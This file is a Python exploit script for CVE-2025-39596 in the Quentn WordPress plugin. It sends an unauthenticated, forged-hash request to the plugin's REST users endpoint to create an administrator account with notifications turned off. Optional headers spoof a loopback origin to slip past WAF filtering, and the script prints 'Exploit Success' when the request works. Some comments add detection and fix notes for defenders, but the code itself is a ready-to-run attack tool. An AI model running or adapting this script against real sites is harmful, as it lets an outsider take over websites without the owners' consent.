#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import base64
import hashlib
import json
import random
import requests
import time
import urllib3
from urllib.parse import urlparse
def print_banner():
    """Print the ASCII-art banner followed by the author credit line.

    Output only; nothing is returned and no state is changed.
    """
    # Raw string so the art is emitted exactly as written.
    art = r"""
@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@
@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@
!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ @@! @@@ !@@ @@! @@@ !@@
!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ !@! @!@ !@! !@! @!@ !@!
!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@!!@ !!@!!@!! !!@@!! !!@!!@!! !!@@!@!
!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!@!@! !!@!!! @!!@!!! !!@!!! @!!@!!!!
:!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !!! !:! !!! !:! !:!
:!: ::!!:! :!: :!: :!: !:! :!: !:! :!: !:! !:! !:! :!: !:!
::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: :::: ::::: :: :::: :: ::::: :: :::: :::
:: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : : : : : : : :: : : : : : :: : :
"""
    print(art)
    print("Nxploited | Khaled Alenazi\n")
def gen_headers(cookie=None, add_extra=False):
    """Build the HTTP headers sent with the POST request.

    Args:
        cookie: Optional raw ``Cookie`` header value; added only when truthy.
        add_extra: When true, also adds Referer, X-Forwarded-For, Forwarded,
            Nxploited-Skip and Accept headers.

    Returns:
        dict mapping header names to their values.
    """
    # Detection note: every User-Agent candidate contains the literal
    # "Nxploited", the same token is appended again below, and a fixed
    # X-Nxploited header is always sent, so traffic from the unmodified
    # script is easy to spot in web-server and WAF logs.
    user_agents = (
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited",
        "Mozilla/5.0 (X11; Linux x86_64) Nxploited",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Nxploited",
        "Nxploited/1.0 (compatible;)",
        "Nxploited/2.0 (Special Edition)",
        "Mozilla/5.0 Nxploited",
        "Nxploited-Bypass/7.0",
        "Nxploited-Advanced/1337",
    )
    headers = {
        "User-Agent": f"{random.choice(user_agents)} | Nxploited",
        "X-Nxploited": "Nxploited",
        "Content-Type": "application/json",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "close",
    }
    if add_extra:
        # Client-supplied forwarding headers that claim a loopback origin.
        # A server or reverse proxy should not treat these as a trusted
        # source address unless it set them itself.
        headers.update(
            {
                "Referer": "https://google.com/Nxploited",
                "X-Forwarded-For": "127.0.0.1",
                "Forwarded": "for=127.0.0.1",
                "Nxploited-Skip": "true",
                "Accept": "*/*",
            }
        )
    if cookie:
        headers["Cookie"] = cookie
    return headers
def build_inner_json(email, fname, lname, role):
    """Assemble the inner request document before it is encoded.

    Args:
        email: Value stored under ``users[0].email``.
        fname: Value stored under ``users[0].first_name``.
        lname: Value stored under ``users[0].last_name``.
        role: Single role name placed in ``roles.add_roles``.

    Returns:
        dict with one ``data`` key holding the user list, the role change
        and ``notify`` set to ``False``.
    """
    user_entry = {
        "email": email,
        "first_name": fname,
        "last_name": lname,
    }
    body = {
        "users": [user_entry],
        "roles": {"add_roles": [role]},
        # NOTE(review): presumably tells the plugin not to send a
        # notification mail. Confirm against the plugin source. When
        # auditing a site, look for unexpected accounts holding the
        # requested role rather than relying on mail alerts.
        "notify": False,
    }
    return {"data": body}
def encode_payload(inner_json):
    """Serialize *inner_json* to JSON text and return it base64-encoded as ``str``."""
    serialized = json.dumps(inner_json)
    # Base64 is an encoding, not protection: the content is readable by
    # anyone who decodes the ``data`` field.
    return base64.b64encode(serialized.encode()).decode()
def gen_vu():
    """Return the current Unix time plus a random offset of 1800 to 3700 seconds.

    NOTE(review): ``vu`` is presumably a "valid until" timestamp checked by
    the receiving endpoint. Confirm against the plugin source.
    """
    offset_seconds = random.randint(1800, 3700)
    return int(time.time()) + offset_seconds
def build_hash(b64_data, vu, key):
    """Return the SHA-256 hex digest of ``b64_data`` + ``vu`` (+ ``key`` when truthy).

    Args:
        b64_data: Encoded payload string.
        vu: Timestamp value; formatted into the digest input as text.
        key: API key; left out of the digest input entirely when falsy.

    Returns:
        64-character lowercase hex string.
    """
    material = f"{b64_data}{vu}"
    if key:
        material += f"{key}"
    # With no key, the digest covers only values the sender chose, so it
    # authenticates nothing.
    # NOTE(review): presumably this mirrors the server-side check when no API
    # key is configured. A fix would reject requests while the key is unset and
    # verify a keyed MAC with a constant-time comparison. Confirm against the
    # vendor patch.
    return hashlib.sha256(material.encode()).hexdigest()
def build_payload(email, fname, lname, role, key):
    """Build the outer request body: encoded data, timestamp and digest.

    Args:
        email, fname, lname, role: Passed through to ``build_inner_json``.
        key: API key forwarded to ``build_hash``; may be empty.

    Returns:
        dict with keys ``data`` (base64 string), ``vu`` (int) and ``hash``
        (SHA-256 hex digest over the other two plus the key, if any).
    """
    encoded = encode_payload(build_inner_json(email, fname, lname, role))
    valid_until = gen_vu()
    # The digest is computed over exactly the values placed in the body, so
    # the three fields are consistent with each other.
    return {
        "data": encoded,
        "vu": valid_until,
        "hash": build_hash(encoded, valid_until, key),
    }
def normalize_url(url):
    """Turn a site URL or bare host into the plugin's REST endpoint URL.

    Schemes other than http/https fall back to http. When the input carries
    a scheme, anything after the host is discarded. Without a scheme, the
    whole string is used as the host part.

    Returns:
        ``<scheme>://<host>/wp-json/quentn/api/v1/users``
    """
    parts = urlparse(url, "http")
    scheme = parts.scheme if parts.scheme in ("http", "https") else "http"
    # A schemeless input such as "example.com" parses with an empty netloc
    # and the host in .path, hence the fallback.
    host = parts.netloc or parts.path
    # Detection note: this fixed route is what to search for in access logs
    # and what a WAF or reverse-proxy rule would restrict until the plugin
    # is patched.
    return f"{scheme}://{host.rstrip('/')}/wp-json/quentn/api/v1/users"
def send_exploit(url, payload, headers, proxies=None, verify_ssl=False):
    """POST *payload* as a JSON body to *url*.

    Args:
        url: Full endpoint URL.
        payload: JSON-serializable request body.
        headers: Header dict for the request.
        proxies: Optional ``requests`` proxy mapping; ``None`` becomes ``{}``.
        verify_ssl: Passed to ``requests`` as ``verify``.

    Returns:
        The ``requests`` response on success, otherwise the exception object
        that was raised (it is returned, not re-raised).
    """
    # NOTE(review): this silences InsecureRequestWarning for the whole process
    # on every call, even when verify_ssl is True. verify_ssl also defaults to
    # False, so certificate checking is off unless the caller opts in.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    try:
        return requests.post(
            url,
            headers=headers,
            data=json.dumps(payload),
            timeout=20,
            proxies=proxies or {},
            verify=verify_ssl,
        )
    except Exception as err:
        # Broad catch: serialization and transport errors alike are handed
        # back to the caller as a value.
        return err
def is_success(response):
    """Classify the outcome of the request.

    Args:
        response: Either an exception instance or an object exposing
            ``text`` and ``status_code``.

    Returns:
        ``(ok, message)``. ``ok`` is True only when the response body
        contains the literal "Data Successfully Updated".
    """
    if isinstance(response, Exception):
        verdict = (False, f"Request Error: {response}")
    elif "Data Successfully Updated" in response.text:
        # Detection note: a response carrying this string to an
        # unauthenticated POST on the users route is worth alerting on.
        verdict = (True, "Exploit Success By | Nxploited")
    else:
        # Only the first 256 characters of the body are echoed.
        verdict = (False, f"{response.status_code} | {response.text[:256]}")
    return verdict
def main():
    """Command-line entry point.

    Parses the options, derives the endpoint URL, builds the request body
    and headers, sends one POST and prints the resulting message.
    """
    print_banner()

    cli = argparse.ArgumentParser(description="CVE-2025-39596 | Nxploited")
    cli.add_argument("-u", "--url", required=True, help="Target WordPress site URL")
    cli.add_argument("-e", "--email", required=True, help="Email for new admin account")
    cli.add_argument("-f", "--fname", default="Pwn", help="First name")
    cli.add_argument("-l", "--lname", default="Admin", help="Last name")
    cli.add_argument("-r", "--role", default="administrator", help="Role to assign")
    cli.add_argument("-k", "--key", default="", help="Quentn API key if known")
    cli.add_argument("--cookie", default=None, help="Add cookie for authenticated bypass if needed")
    cli.add_argument("--proxy", default=None, help="Proxy (ex: http://127.0.0.1:8080)")
    cli.add_argument("--skip-ssl", action="store_true", help="Skip SSL verification")
    cli.add_argument("--extra", action="store_true", help="Add extra headers (bypass/WAF/etc)")
    opts = cli.parse_args()

    target = normalize_url(opts.url)
    body = build_payload(opts.email, opts.fname, opts.lname, opts.role, opts.key)
    headers = gen_headers(opts.cookie, opts.extra)

    # One proxy URL, when given, is used for both schemes.
    proxies = None
    if opts.proxy:
        proxies = {"http": opts.proxy, "https": opts.proxy}

    # Certificate verification stays on unless --skip-ssl is passed.
    result = send_exploit(target, body, headers, proxies, not opts.skip_ssl)
    # Only the message is used; the boolean does not affect the exit status.
    _, message = is_success(result)
    print(message)
# Run the CLI only when executed as a script, so importing the module has no
# side effects.
if __name__ == "__main__":
    main()